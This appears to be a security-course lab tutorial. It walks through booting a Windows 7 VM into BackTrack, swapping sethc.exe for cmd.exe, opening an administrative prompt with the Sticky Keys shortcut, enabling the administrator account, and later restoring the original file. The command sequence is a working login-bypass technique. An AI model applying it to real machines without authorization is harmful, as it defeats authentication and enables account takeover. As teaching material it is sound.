(Password Clearing: Lesson 2)

{ Use BackTrack to Replace sethc.exe with cmd.exe }

1. What is sethc.exe 
   • sethc.exe is a program that controls some the accessibility options for disabled people to read the login prompt.
   • The accessibility option is invoked by clicking in the Windows Password Box and pressing the shift key 5 times.  
   • From the windows login screen, winlogon.exe launches sethc.exe that provides the aforementioned accessibilities options.
   • Consequently, sethc.exe can be compromised, since the winlogin.exe does not exactly check what is launched when pressing the shift key 5 times in the password text box.
   
   
2. Lab Notes
   • In this lab we will do the following:
     1. Download the BackTrack5R1 iso
     2. Boot Windows 7 VM into the BackTrack5R1 Environment
     3. Mount the Windows Hard Drive in the BackTrack Environment
     4. We will copy compromise sethc.exe by replacing it with cmd.exe
     5. We implement the exploit by pressing shift 5 times.
     6. We will active and reset the administrative account.
     
     
3. Prerequisites
   • Instructions:
     1. Windows 7: Lesson 1: Installing Windows 7
   
   
4. Legal Disclaimer
   • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
   • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
   • In addition, this is a teaching website that does not condone malicious behavior of any kind.
   • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
   • © 2012 No content replication of any kind is allowed without express written permission.

1. Open A Firefox Browser
   • Notes: 
     • Login to the machine that has VM Player Installed.
   • Instructions: 
     1. Click on the Windows Start Button
     2. Type firefox in the search box
     3. Click on Mozilla Firefox
   • 

    

2. Open A Firefox Browser
   • Instructions: 
     1. Place the following address in the Firefox Browser
        • http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R1-GNOME-32.iso
     2. Click the Save File Radio Button
     3. Click OK to download
   • 

    

3. Navigate and Save
   • Instructions: 
     1. Navigate to your external USB hard drive.
     2. Create a directory call BackTrack-ISO on your
     3. Click Save
   • 

1. Edit Virtual Machine Settings
   • Instructions: 
     1. Click on Windows 7
     2. Click on Edit virtual machine
   • 

    

2. Configure CD/DVD (IDE)
   • Instructions
     1. Configure CD/DVD (IDE)
     2. Click the radio button "Use ISO image file:"
     3. Click the Browse button and Navigate to the location of the BT5R1-GNOME-32.iso
     4. Click the Okay button
   • 

    

3. Start Windows 7
   • Instructions: 
     1. Click on Windows 7
     2. Click on Play virtual machine
   • 

    

4. Access the Boot Menu
   • Instructions
     1. Once you see the below vmware screen, (1) Left Click in the screen and (2) press the <Esc> key.
   • 

    

5. Boot from CD-ROM Drive
   • Instructions
     1. Arrow Down to where CD-ROM Drive is highlighted
     2. Press <Enter>
   • 

1. Press any key to enter the menu
   • Instructions
     1. Press <Enter>
   • 

    

2. Select BackTrack Text
   • Instructions
     1. Select BackTrack Text - Default Boot Text Mode.
   • 

    

3. Mount the Windows Hard Drive
   • Instructions
     1. fdisk -l
     2. mount -t ntfs /dev/sda1 /mnt
   • 

    

4. View Windows File System
   • Instructions
     1. df -k
   • Note(FYI):
     • Notice the /mnt directory is mounted on the /dev/sda1 filesystem (a.k.a., disk)
   • 

    

5. Navigate to the Windows/System32 Directory
   • Instructions
     1. cd /mnt
     2. ls
     3. cd Windows/System32/
   • 

    

6. Replace sethc.exe with cmd.exe
   • Instructions
     1. cp sethc.exe sethc.exe.bkp
     2. cp cmd.exe sethc.exe
     3. cd /
     4. umount /mnt
     5. reboot
     6. Press <Enter>
   • Notes (FYI)
     • If you do not have an IP Address, do the following:
       1. /etc/init.d/network restart
          OR
       2. dhclient eth0
   • 

    

1. Implement the Accessibility Option
   • Instructions
     1. In the password box, Press the Shift Key 5 Times
   • 

    

2. Do you want to turn on Sticky Keys?
   • Instructions:
     1. Click No
   • 

    

3. Administrative Command Prompt
   • Note(FYI):
     • Now you will see an administrative command prompt. 
   • Instructions:
     1. net user administrator * /active:yes
     2. shutdown -r -t 5 -c "Nice Trick"
   • 

    

4. Login as Administrator
   • Instructions
     1. Click the Administrator account
   • Note(FYI)
     • Previously, only Security Student was the active account.
   • 

    

5. Administrator Password
   • Instructions
     1. Provide the password created in (Section 4, Step 3).
   • 

1. Open A Command Prompt
   • Instructions
     1. Click on the Start Button
     2. Type "cmd" in the search box
     3. Click on cmd
   • 
    
2. Proof of Lab Instructions
   • Instructions:
     1. net user administrator
     2. date
     3. Press <Enter>
     4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
     5. Do a PrtScn
     6. Paste into a word document
     7. Upload to Moodle
   • 

1. Access Virtual Machine Settings
   • Instructions:
     1. Virtual Machine --> Virtual Machine Settings...
   • 

    

2. Configure CD/DVD (IDE)
   • Instructions
     1. Configure CD/DVD (IDE)
     2. Check the Connect at power on checkbox
     3. Click the radio button "Use ISO image file:"
     4. Click the Browse button and Navigate to the location of the BT5R1-GNOME-32.iso
     5. Click the Okay button
   • 

    

3. Restart Windows
   • Instructions
     1. Click Start Button
     2. Click Restart
   • 

    

4. Access the Boot Menu
   • Instructions
     1. Once you see the below vmware screen, (1) Left Click in the screen and (2) press the <Esc> key.
   • 

    

5. Boot from CD-ROM Drive
   • Instructions
     1. Arrow Down to where CD-ROM Drive is highlighted
     2. Press <Enter>
   • 

    

6. Press any key to enter the menu
   • Instructions
     1. Press <Enter>
   • 

    

7. Select BackTrack Text
   • Instructions
     1. Select BackTrack Text - Default Boot Text Mode.
   • 

    

8. Mount the Windows Hard Drive
   • Instructions
     1. fdisk -l
     2. mount -t ntfs /dev/sda1 /mnt
   • 

    

9. View Windows File System
   • Instructions
     1. df -k
   • Note(FYI):
     • Notice the /mnt directory is mounted on the /dev/sda1 filesystem (a.k.a., disk)
   • 

    

10. Navigate to the Windows/System32 Directory
    • Instructions
      1. cd /mnt
      2. ls
      3. cd Windows/System32/
    • 

     

11. Restore sethc.exe
    • Instructions
      1. cp sethc.exe.bkp sethc.exe
      2. cd /
      3. umount /mnt
      4. poweroff
      5. Press <Enter>
    •